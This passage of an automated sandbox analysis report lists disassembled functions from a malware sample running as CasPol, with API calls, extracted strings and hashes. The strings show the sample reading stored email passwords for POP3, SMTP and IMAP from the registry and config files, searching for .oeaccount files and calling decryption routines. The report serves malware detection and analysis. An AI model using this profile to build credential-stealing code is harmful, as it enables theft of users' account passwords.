                                                                                                                                                                                  • API ID: Enum
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2928410991-0
                                                                                                                                                                                  • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                  • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                  Function 00410ADD Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                                  • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                  • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                  Function 00407560 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                  • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                  • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                  Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                  Function 0040C580 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0040CF3F,00000000,00000000,00000000,?,?,0040D05D), ref: 0040C591
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                  • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                                                                                                                                                                                  Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                  Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                  Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                  Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                  Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                  • API String ID: 2238633743-192783356
                                                                                                                                                                                  • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                  • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                  Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                  • API String ID: 52435246-1534328989
                                                                                                                                                                                  • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                  • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                  • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                  Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                                  • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                  • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                  Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3116012682-0
                                                                                                                                                                                  • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                  • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                  Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                  • API String ID: 3963849919-1658304561
                                                                                                                                                                                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                  Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID: (yE$(yE$(yE
                                                                                                                                                                                  • API String ID: 1865533344-362086290
                                                                                                                                                                                  • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                  Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                  • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                  • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                  • API String ID: 1895597112-3210201812
                                                                                                                                                                                  • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                  • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                  Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                  • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                  • API String ID: 1714764973-479759155
                                                                                                                                                                                  • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                  • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                  Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EBD8
